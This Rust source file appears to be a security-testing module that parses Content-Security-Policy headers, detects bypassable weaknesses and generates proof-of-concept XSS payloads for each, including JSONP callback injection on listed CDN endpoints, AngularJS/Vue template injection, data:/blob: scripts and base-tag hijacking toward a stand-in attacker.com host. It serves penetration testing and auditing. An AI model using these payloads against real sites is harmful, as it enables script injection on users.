use std::collections::HashMap;
use std::fmt;

use serde::{Deserialize, Serialize};

/// A parsed Content-Security-Policy header broken into individual directives.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CspPolicy {
    pub directives: HashMap<CspDirective, Vec<String>>,
    pub report_only: bool,
}

/// Supported CSP directive types.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub enum CspDirective {
    DefaultSrc,
    ScriptSrc,
    StyleSrc,
    ImgSrc,
    ConnectSrc,
    FontSrc,
    ObjectSrc,
    MediaSrc,
    FrameSrc,
    ChildSrc,
    WorkerSrc,
    BaseUri,
    FormAction,
    FrameAncestors,
    ReportUri,
    ReportTo,
}

impl CspDirective {
    fn from_str_name(s: &str) -> Option<Self> {
        match s {
            "default-src" => Some(Self::DefaultSrc),
            "script-src" => Some(Self::ScriptSrc),
            "style-src" => Some(Self::StyleSrc),
            "img-src" => Some(Self::ImgSrc),
            "connect-src" => Some(Self::ConnectSrc),
            "font-src" => Some(Self::FontSrc),
            "object-src" => Some(Self::ObjectSrc),
            "media-src" => Some(Self::MediaSrc),
            "frame-src" => Some(Self::FrameSrc),
            "child-src" => Some(Self::ChildSrc),
            "worker-src" => Some(Self::WorkerSrc),
            "base-uri" => Some(Self::BaseUri),
            "form-action" => Some(Self::FormAction),
            "frame-ancestors" => Some(Self::FrameAncestors),
            "report-uri" => Some(Self::ReportUri),
            "report-to" => Some(Self::ReportTo),
            _ => None,
        }
    }
}

impl fmt::Display for CspDirective {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        let name = match self {
            Self::DefaultSrc => "default-src",
            Self::ScriptSrc => "script-src",
            Self::StyleSrc => "style-src",
            Self::ImgSrc => "img-src",
            Self::ConnectSrc => "connect-src",
            Self::FontSrc => "font-src",
            Self::ObjectSrc => "object-src",
            Self::MediaSrc => "media-src",
            Self::FrameSrc => "frame-src",
            Self::ChildSrc => "child-src",
            Self::WorkerSrc => "worker-src",
            Self::BaseUri => "base-uri",
            Self::FormAction => "form-action",
            Self::FrameAncestors => "frame-ancestors",
            Self::ReportUri => "report-uri",
            Self::ReportTo => "report-to",
        };
        write!(f, "{name}")
    }
}

/// Categories of CSP weakness that can lead to bypass.
#[derive(Debug, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub enum CspWeakness {
    UnsafeInline,
    UnsafeEval,
    WildcardDomain {
        pattern: String,
    },
    JsonpEndpoint {
        domain: String,
        endpoint: String,
    },
    FrameworkTemplateInjection {
        framework: String,
        cdn_domain: String,
    },
    DataUri,
    BlobUri,
    MissingBaseUri,
    NonceReuse {
        nonce: String,
    },
    MissingObjectSrc,
}

impl fmt::Display for CspWeakness {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            Self::UnsafeInline => write!(f, "unsafe-inline allows inline script execution"),
            Self::UnsafeEval => write!(f, "unsafe-eval allows eval-based script execution"),
            Self::WildcardDomain { pattern } => {
                write!(
                    f,
                    "wildcard domain {pattern} allows hosting on any subdomain"
                )
            }
            Self::JsonpEndpoint { domain, endpoint } => {
                write!(f, "JSONP endpoint on whitelisted CDN {domain}: {endpoint}")
            }
            Self::FrameworkTemplateInjection {
                framework,
                cdn_domain,
            } => {
                write!(
                    f,
                    "{framework} template injection via whitelisted CDN {cdn_domain}"
                )
            }
            Self::DataUri => write!(f, "data: URI allows base64-encoded script execution"),
            Self::BlobUri => write!(f, "blob: URI allows blob URL script execution"),
            Self::MissingBaseUri => {
                write!(
                    f,
                    "missing base-uri allows base tag injection for relative URL hijacking"
                )
            }
            Self::NonceReuse { nonce } => {
                write!(
                    f,
                    "predictable/reused nonce '{nonce}' enables nonce fixation"
                )
            }
            Self::MissingObjectSrc => {
                write!(f, "missing object-src allows plugin-based script execution")
            }
        }
    }
}

/// A generated bypass payload targeting a specific CSP weakness.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CspBypass {
    pub weakness: CspWeakness,
    pub payload: String,
    pub description: String,
}

/// Known JSONP endpoints on popular CDN/service domains.
struct JsonpEntry {
    domain: &'static str,
    endpoint: &'static str,
    callback_param: &'static str,
}

const JSONP_ENDPOINTS: &[JsonpEntry] = &[
    JsonpEntry {
        domain: "cdnjs.cloudflare.com",
        endpoint: "/ajax/libs/angular.js/1.6.0/angular.min.js",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "ajax.googleapis.com",
        endpoint: "/ajax/libs/angularjs/1.6.0/angular.min.js",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "cdn.jsdelivr.net",
        endpoint: "/npm/angular@1.6.0/angular.min.js",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "accounts.google.com",
        endpoint: "/o/oauth2/revoke",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "www.google.com",
        endpoint: "/complete/search",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "api.twitter.com",
        endpoint: "/1/urls/count.json",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "syndication.twitter.com",
        endpoint: "/timeline/profile",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "www.youtube.com",
        endpoint: "/oembed",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "cse.google.com",
        endpoint: "/api",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "maps.googleapis.com",
        endpoint: "/maps/api/js",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "translate.googleapis.com",
        endpoint: "/translate_a/t",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "graph.facebook.com",
        endpoint: "/v2.0/me",
        callback_param: "callback",
    },
    JsonpEntry {
        domain: "api.flickr.com",
        endpoint: "/services/feeds/photos_public.gne",
        callback_param: "jsoncallback",
    },
];

/// Framework CDN domains that can be exploited for template injection.
struct FrameworkEntry {
    domain: &'static str,
    framework: &'static str,
}

const FRAMEWORK_CDNS: &[FrameworkEntry] = &[
    FrameworkEntry {
        domain: "cdnjs.cloudflare.com",
        framework: "AngularJS",
    },
    FrameworkEntry {
        domain: "ajax.googleapis.com",
        framework: "AngularJS",
    },
    FrameworkEntry {
        domain: "cdn.jsdelivr.net",
        framework: "Vue.js",
    },
    FrameworkEntry {
        domain: "unpkg.com",
        framework: "React",
    },
    FrameworkEntry {
        domain: "cdn.jsdelivr.net",
        framework: "AngularJS",
    },
];

impl CspPolicy {
    /// Parse a CSP header value into structured directives.
    /// Set `report_only` to true when the header name is Content-Security-Policy-Report-Only.
    pub fn parse(header_value: &str, report_only: bool) -> Self {
        let mut directives = HashMap::new();

        for raw_directive in header_value.split(';') {
            let trimmed = raw_directive.trim();
            if trimmed.is_empty() {
                continue;
            }

            let mut parts = trimmed.split_whitespace();
            let Some(name) = parts.next() else {
                continue;
            };

            let Some(directive) = CspDirective::from_str_name(name) else {
                continue;
            };

            let values: Vec<String> = parts.map(String::from).collect();
            directives.insert(directive, values);
        }

        Self {
            directives,
            report_only,
        }
    }

    /// Resolve the effective source list for a given directive, falling back to default-src.
    pub fn effective_sources(&self, directive: CspDirective) -> Option<&[String]> {
        self.directives
            .get(&directive)
            .or_else(|| self.directives.get(&CspDirective::DefaultSrc))
            .map(|v| v.as_slice())
    }

    /// Detect all weaknesses in this CSP policy that could allow XSS bypass.
    pub fn detect_weaknesses(&self) -> Vec<CspWeakness> {
        let mut weaknesses = Vec::new();

        let script_sources = self.effective_sources(CspDirective::ScriptSrc);

        if let Some(sources) = script_sources {
            self.check_unsafe_inline(sources, &mut weaknesses);
            self.check_unsafe_eval(sources, &mut weaknesses);
            self.check_wildcard_domains(sources, &mut weaknesses);
            self.check_jsonp_endpoints(sources, &mut weaknesses);
            self.check_framework_injection(sources, &mut weaknesses);
            self.check_data_uri(sources, &mut weaknesses);
            self.check_blob_uri(sources, &mut weaknesses);
            self.check_nonce_reuse(sources, &mut weaknesses);
        }

        self.check_missing_base_uri(&mut weaknesses);
        self.check_missing_object_src(&mut weaknesses);

        weaknesses
    }

    /// Generate bypass payloads for every detected weakness.
    pub fn generate_bypasses(&self) -> Vec<CspBypass> {
        self.detect_weaknesses()
            .into_iter()
            .flat_map(|w| generate_payloads_for_weakness(&w))
            .collect()
    }

    fn check_unsafe_inline(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        if sources.iter().any(|s| s == "'unsafe-inline'") {
            out.push(CspWeakness::UnsafeInline);
        }
    }

    fn check_unsafe_eval(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        if sources.iter().any(|s| s == "'unsafe-eval'") {
            out.push(CspWeakness::UnsafeEval);
        }
    }

    fn check_wildcard_domains(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        for source in sources {
            if source.starts_with("*.") || source == "*" {
                out.push(CspWeakness::WildcardDomain {
                    pattern: source.clone(),
                });
            }
        }
    }

    fn check_jsonp_endpoints(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        for source in sources {
            let normalized = source
                .trim_start_matches("https://")
                .trim_start_matches("http://");
            for entry in JSONP_ENDPOINTS {
                if domain_matches(normalized, entry.domain) {
                    out.push(CspWeakness::JsonpEndpoint {
                        domain: entry.domain.to_string(),
                        endpoint: entry.endpoint.to_string(),
                    });
                }
            }
        }
    }

    fn check_framework_injection(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        for source in sources {
            let normalized = source
                .trim_start_matches("https://")
                .trim_start_matches("http://");
            for entry in FRAMEWORK_CDNS {
                if domain_matches(normalized, entry.domain) {
                    out.push(CspWeakness::FrameworkTemplateInjection {
                        framework: entry.framework.to_string(),
                        cdn_domain: entry.domain.to_string(),
                    });
                }
            }
        }
    }

    fn check_data_uri(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        if sources.iter().any(|s| s == "data:") {
            out.push(CspWeakness::DataUri);
        }
    }

    fn check_blob_uri(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        if sources.iter().any(|s| s == "blob:") {
            out.push(CspWeakness::BlobUri);
        }
    }

    fn check_nonce_reuse(&self, sources: &[String], out: &mut Vec<CspWeakness>) {
        for source in sources {
            if let Some(nonce) = source.strip_prefix("'nonce-") {
                let nonce = nonce.trim_end_matches('\'');
                let is_weak = nonce.len() < 10
                    || nonce.chars().all(|c| c.is_ascii_digit())
                    || nonce == "static-nonce"
                    || nonce == "test"
                    || nonce == "abc123";
                if is_weak {
                    out.push(CspWeakness::NonceReuse {
                        nonce: nonce.to_string(),
                    });
                }
            }
        }
    }

    fn check_missing_base_uri(&self, out: &mut Vec<CspWeakness>) {
        if !self.directives.contains_key(&CspDirective::BaseUri) {
            out.push(CspWeakness::MissingBaseUri);
        }
    }

    fn check_missing_object_src(&self, out: &mut Vec<CspWeakness>) {
        if !self.directives.contains_key(&CspDirective::ObjectSrc)
            && !self
                .directives
                .get(&CspDirective::DefaultSrc)
                .map(|v| v.iter().any(|s| s == "'none'"))
                .unwrap_or(false)
        {
            out.push(CspWeakness::MissingObjectSrc);
        }
    }
}

/// Check whether a CSP source expression matches a known domain.
/// Handles bare domains, wildcard prefixed domains, and path-trimmed sources.
fn domain_matches(source: &str, target_domain: &str) -> bool {
    let host = source.split('/').next().unwrap_or(source);
    let host = host.split(':').next().unwrap_or(host);
    host == target_domain || host.ends_with(&format!(".{target_domain}"))
}

fn generate_payloads_for_weakness(weakness: &CspWeakness) -> Vec<CspBypass> {
    match weakness {
        CspWeakness::UnsafeInline => vec![
            CspBypass {
                weakness: weakness.clone(),
                payload: "<script>alert(document.domain)</script>".to_string(),
                description: "Inline script tag execution via unsafe-inline".to_string(),
            },
            CspBypass {
                weakness: weakness.clone(),
                payload: "<img src=x onerror=alert(document.domain)>".to_string(),
                description: "Event handler XSS via unsafe-inline".to_string(),
            },
            CspBypass {
                weakness: weakness.clone(),
                payload: "<svg onload=alert(document.domain)>".to_string(),
                description: "SVG onload XSS via unsafe-inline".to_string(),
            },
        ],
        CspWeakness::UnsafeEval => vec![
            CspBypass {
                weakness: weakness.clone(),
                payload: "<script>eval('alert(document.domain)')</script>".to_string(),
                description: "eval() execution via unsafe-eval".to_string(),
            },
            CspBypass {
                weakness: weakness.clone(),
                payload: "<script>new Function('alert(document.domain)')()</script>".to_string(),
                description: "Function constructor via unsafe-eval".to_string(),
            },
            CspBypass {
                weakness: weakness.clone(),
                payload: "<script>setTimeout('alert(document.domain)',0)</script>".to_string(),
                description: "setTimeout string execution via unsafe-eval".to_string(),
            },
        ],
        CspWeakness::WildcardDomain { pattern } => vec![CspBypass {
            weakness: weakness.clone(),
            payload: format!(
                "<script src=\"https://attacker.{}\"></script>",
                pattern.trim_start_matches("*.")
            ),
            description: format!("Host malicious JS on subdomain matching {pattern}"),
        }],
        CspWeakness::JsonpEndpoint { domain, endpoint } => {
            let callback_param = JSONP_ENDPOINTS
                .iter()
                .find(|e| e.domain == domain && e.endpoint == endpoint)
                .map(|e| e.callback_param)
                .unwrap_or("callback");
            vec![CspBypass {
                weakness: weakness.clone(),
                payload: format!(
                    "<script src=\"https://{domain}{endpoint}?{callback_param}=alert(document.domain)//\"></script>"
                ),
                description: format!("JSONP callback injection on whitelisted {domain}"),
            }]
        }
        CspWeakness::FrameworkTemplateInjection {
            framework,
            cdn_domain,
        } => {
            let template_payload = match framework.as_str() {
                "AngularJS" => {
                    format!(
                        "<script src=\"https://{cdn_domain}/ajax/libs/angularjs/1.6.0/angular.min.js\"></script>\
                         <div ng-app ng-csp>{{{{$eval.constructor('alert(document.domain)')()}}}}</div>"
                    )
                }
                "Vue.js" => {
                    format!(
                        "<script src=\"https://{cdn_domain}/npm/vue@2/dist/vue.js\"></script>\
                         <div id=app>{{{{constructor.constructor('alert(document.domain)')()}}}}</div>\
                         <script>new Vue({{el:'#app'}})</script>"
                    )
                }
                _ => {
                    format!(
                        "<script src=\"https://{cdn_domain}/framework.js\"></script>\
                         <!-- {framework} template injection -->"
                    )
                }
            };
            vec![CspBypass {
                weakness: weakness.clone(),
                payload: template_payload,
                description: format!("{framework} template injection via {cdn_domain}"),
            }]
        }
        CspWeakness::DataUri => vec![
            CspBypass {
                weakness: weakness.clone(),
                payload: "<script src=\"data:text/javascript,alert(document.domain)\"></script>"
                    .to_string(),
                description: "data: URI plain text script execution".to_string(),
            },
            CspBypass {
                weakness: weakness.clone(),
                payload:
                    "<script src=\"data:text/javascript;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==\"></script>"
                        .to_string(),
                description: "data: URI base64-encoded script execution".to_string(),
            },
        ],
        CspWeakness::BlobUri => vec![CspBypass {
            weakness: weakness.clone(),
            payload:
                "<script>var b=new Blob(['alert(document.domain)'],{type:'text/javascript'});\
                 var u=URL.createObjectURL(b);var s=document.createElement('script');\
                 s.src=u;document.body.appendChild(s)</script>"
                    .to_string(),
            description: "Blob URL script execution via blob: URI allowance".to_string(),
        }],
        CspWeakness::MissingBaseUri => vec![CspBypass {
            weakness: weakness.clone(),
            payload: "<base href=\"https://attacker.com/\">"
                .to_string(),
            description: "Base tag injection to hijack relative URL resolution".to_string(),
        }],
        CspWeakness::NonceReuse { nonce } => vec![CspBypass {
            weakness: weakness.clone(),
            payload: format!(
                "<script nonce=\"{nonce}\">alert(document.domain)</script>"
            ),
            description: format!("Nonce fixation using predictable nonce '{nonce}'"),
        }],
        CspWeakness::MissingObjectSrc => vec![CspBypass {
            weakness: weakness.clone(),
            payload: "<object data=\"data:text/html,<script>alert(document.domain)</script>\">\
                      </object>"
                .to_string(),
            description: "Plugin-based execution via missing object-src restriction".to_string(),
        }],
    }
}

/// Return the full list of known JSONP endpoint domains.
pub fn known_jsonp_domains() -> Vec<&'static str> {
    JSONP_ENDPOINTS.iter().map(|e| e.domain).collect()
}

/// Return the count of unique JSONP domains in the database.
pub fn jsonp_domain_count() -> usize {
    let mut seen = std::collections::HashSet::new();
    for entry in JSONP_ENDPOINTS {
        seen.insert(entry.domain);
    }
    seen.len()
}

#[cfg(test)]
#[path = "csp_bypass_test.rs"]
mod csp_bypass_test;
